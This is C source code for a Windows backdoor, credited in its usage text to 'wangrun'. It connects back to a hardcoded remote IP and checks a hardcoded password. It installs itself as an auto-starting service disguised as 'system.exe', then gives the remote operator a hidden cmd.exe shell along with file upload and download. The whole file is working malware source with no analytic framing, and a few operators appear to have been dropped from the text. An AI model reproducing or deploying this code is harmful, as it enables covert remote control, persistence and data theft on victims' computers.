#include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") void WINAPI ServiceMain(DWORD,LPTSTR *); DWORD WINAPI CmdService(LPVOID); DWORD WINAPI CmdShell(LPVOID); void WINAPI ServiceCtrlHandler(DWORD Opcode); BOOL InstallCmdService(); void DelServices(); int door(); void Usage(void); VOID WINAPI EXEBackMain (LPVOID s); SERVICE_STATUS m_ServiceStatus; SERVICE_STATUS_HANDLE m_ServiceStatusHandle; BOOL bRunning=true; BOOL flag=true; #define PASSSUCCESS "Password success!\n" #define PASSERROR "Password error.\n" #define BYEBYE "ByeBye!\n" #define WSAerron WSAGetLastError() #define erron GetLastError() #define PORT 80 //远程的连接端口 #define DEST_IP_ADDR "192.168.181.128"//要连接的远程IP int main(int argc,char *argv[]) { SERVICE_TABLE_ENTRY DispatchTable[] = { {"system",ServiceMain},//服务程序的名称和入口点(函数) {NULL ,NULL }//SERVICE_TABLE_ENTRY结构必须以“NULL”结束; }; if(argc==1) door(); if(argc==2) { if(!stricmp(argv[1],"-i"))//如果第二个参数等于-install { InstallCmdService(); } else if(!stricmp(argv[1],"-r"))//比较字符串s1和s2 { DelServices(); } else { Usage(); } return 0; } StartServiceCtrlDispatcher(DispatchTable);//把入口点的地址传入 return 0; } int door () { SOCKET sock=NULL; struct sockaddr_in sai; TCHAR UserPass[20]={0}; //用户设置密码缓冲 TCHAR PassBuf[20]={0}; //接收密码缓冲 TCHAR PassBanner[]="Password:"; TCHAR Banner[]="--------- backdoor---------\n"; sai.sin_family=AF_INET; sai.sin_addr.s_addr=inet_addr(DEST_IP_ADDR); sai.sin_port=htons(PORT); //sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); while (TRUE) { WSADATA wsadata; BOOL ThreadFlag=FALSE; DWORD ThreadID=0; int nRet=0; nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化 if (nRet) { return 0; } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sock==INVALID_SOCKET) { goto Clean; } nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr)); Sleep(3000); if (nRet!=SOCKET_ERROR) { nRet=send(sock,Banner,sizeof (Banner),0); while (TRUE) { nRet=send(sock,PassBanner,sizeof (PassBanner),0); nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0); if 
(strnicmp(PassBuf,"wangrun",strlen("wangrun"))==0) { send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0); ThreadFlag=TRUE; break; } if (nRet==SOCKET_ERROR) { goto Clean; } Sleep(100); } if (ThreadFlag) { CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,(LPVOID)sock,0,&ThreadID); while(flag) {} flag=true; } } Sleep(1000); } Clean: if (sock!=NULL) closesocket(sock); WSACleanup(); return 0; } void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv) //服务主函数 { m_ServiceStatus.dwServiceType = SERVICE_WIN32; m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwServiceSpecificExitCode = 0; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandler); if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)return; m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; //设置服务状态 m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; //SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。 //所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置 if( SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus)) bRunning=true; door(); //启动服务程序 return; } void WINAPI ServiceCtrlHandler(DWORD Opcode)//服务控制函数 { switch(Opcode) { case SERVICE_CONTROL_PAUSE: // we accept the command to pause it m_ServiceStatus.dwCurrentState = SERVICE_PAUSED; break; case SERVICE_CONTROL_CONTINUE: m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; break; case SERVICE_CONTROL_STOP: m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus); bRunning=false; break; case SERVICE_CONTROL_INTERROGATE: break; } return; } BOOL InstallCmdService()//安装服务函数 { char strDir[1024]; SC_HANDLE schSCManager,schService; GetCurrentDirectory(1024,strDir);//取当前目录 
GetModuleFileName(NULL,strDir,sizeof(strDir)); //取当前文件路径和文件名 char chSysPath[1024]; GetSystemDirectory(chSysPath,sizeof(chSysPath));//取系统目录 strcat(chSysPath,"\\system.exe"); //将scvhost.exe拼接到系统目录 if(CopyFile(strDir,chSysPath,FALSE))printf("Copy file OK\n"); // 把当前服务程序复制到系统根目录为system.exe strcpy(strDir,chSysPath); schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) { printf("open scmanger failed,maybe you do not have the privilage to do this\n"); return false; } LPCTSTR lpszBinaryPathName=strDir; schService = CreateService(schSCManager, "system", "system", //将服务的信息添加到SCM的数据库 SERVICE_ALL_ACCESS, // desired access SERVICE_WIN32_OWN_PROCESS, // service type SERVICE_AUTO_START, // start type SERVICE_ERROR_NORMAL, // error control type lpszBinaryPathName, // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL); // no password if (schService) printf("Install Service Success!\n"); else return false; CloseServiceHandle(schService); return true; } void DelServices() { char name[100]; SC_HANDLE scm; SC_HANDLE service; SERVICE_STATUS status; strcpy(name,"system"); if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL) { printf("OpenSCManager Error "); } service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE); if (!service) { printf("OpenService error! "); return; } BOOL isSuccess=QueryServiceStatus(service,&status); if (!isSuccess) { printf("QueryServiceStatus error! "); return; } if ( status.dwCurrentState!=SERVICE_STOPPED ) { isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status); if (!isSuccess ) printf("Stop Service error! "); Sleep( 500 ); } isSuccess=DeleteService(service); if (!isSuccess) printf("Delete Service Fail!"); else printf("Delete Service Success! 
"); CloseServiceHandle(service ); CloseServiceHandle(scm); } VOID WINAPI EXEBackMain (LPVOID s) //BOOL EXEBackMain (SOCKET sock) { SOCKET sock=(SOCKET)s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE hRead=NULL,hWrite=NULL; TCHAR CmdSign[]="\nwr:\\>"; while (TRUE) { TCHAR MsgError[50]={0}; //错误消息缓冲 TCHAR Cmdline[300]={0}; //命令行缓冲 TCHAR RecvBuf[1024]={0}; //接收缓冲 TCHAR SendBuf[2048]={0}; //发送缓冲 char *filename; SECURITY_ATTRIBUTES sa; DWORD bytesRead=0; int ret=0,size,i; FILE *fp; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor=NULL; sa.bInheritHandle=TRUE; //创建匿名管道 if (!CreatePipe(&hRead,&hWrite,&sa,0)) { goto Clean; } si.cb=sizeof(STARTUPINFO); GetStartupInfo(&si); si.hStdError=hWrite; si.hStdOutput=hWrite; //进程(cmd)的输出写入管道 si.wShowWindow=SW_HIDE; si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录 strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd /*ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符 if (ret==SOCKET_ERROR) { goto Clean; }*/ ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据 //如果为exit或quit,就退出 if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0) { send(sock,BYEBYE,sizeof (BYEBYE),0); goto Clean; } //upload if (strnicmp(RecvBuf,"upload",6)==0) { filename=RecvBuf 7; if((fp=fopen(filename,"wb"))==NULL) { printf("can't open file \n"); continue; } printf("%s is recving ...\n",filename); recv(sock,(char *)&size,sizeof(size),0); i=0; while((ret=recv(sock,RecvBuf,sizeof (RecvBuf),0))>0) { i =ret; fwrite(RecvBuf,ret,1,fp); memset(RecvBuf,0,sizeof(RecvBuf)); if(i==size) { printf("transport successful!\n"); break; } } fclose(fp); } //download if (strnicmp(RecvBuf,"download",8)==0) { filename=RecvBuf 9; if((fp=fopen(filename,"rb"))==NULL) { printf("can't open file \n"); continue; } printf("%s is sending ...\n",filename); fseek(fp,0,SEEK_END); size=ftell(fp); fseek(fp,0,SEEK_SET); send(sock,(char *)&size,sizeof(size),0); while((ret=fread(SendBuf,1,1024,fp))>0) { 
send(sock,SendBuf,ret,0); memset(SendBuf,0,sizeof(SendBuf)); } fclose(fp); printf("transport successful!\n"); } //表示对方已经断开 if (ret==SOCKET_ERROR) { goto Clean; } //表示接收数据出错 if (ret<=0) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif continue; } Sleep(100); strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令 //创建进程,也就是执行cmd命令 if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { continue; } CloseHandle(hWrite); while (TRUE) { //无限循环读取管道中的数据,直到管道中没有数据为止 if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0) break; send(sock,SendBuf,bytesRead,0); //发送出去 memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零 Sleep(100); } } Clean: //释放句柄 if (hRead!=NULL) CloseHandle(hRead); if (hWrite!=NULL) CloseHandle(hWrite); //释放SOCKET if (sock!=NULL) closesocket(sock); flag=false; WSACleanup(); ExitThread(0); //return 0; } void Usage() { fprintf(stderr,"Code by wangrun\n""Usage:%s [-i] [-r] -i: install service; -r: remove service.\n"); }